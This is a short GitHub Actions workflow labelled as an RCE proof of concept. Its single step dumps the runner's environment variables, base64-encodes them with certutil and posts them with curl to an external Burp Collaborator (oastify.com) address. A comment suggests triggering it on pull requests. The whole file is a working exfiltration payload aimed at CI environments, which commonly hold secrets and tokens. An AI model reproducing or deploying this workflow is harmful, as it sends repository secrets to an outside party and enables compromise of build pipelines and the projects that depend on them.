name: Burp Collaborator RCE PoC

on:
  workflow_dispatch:  # Manual trigger — optional: replace with `pull_request` if needed

jobs:
  burp_rce:
    runs-on: windows-2022
    steps:
      - name: Exfiltrate env to Burp Collaborator
        run: |
          echo "[*] Running RCE PoC"
          set > env.txt
          certutil -encode env.txt env.b64
          curl -X POST --data-binary @env.b64 https://9jtjqrcdeydkmt6ciz1v4sk8pzvqjg75.oastify.com
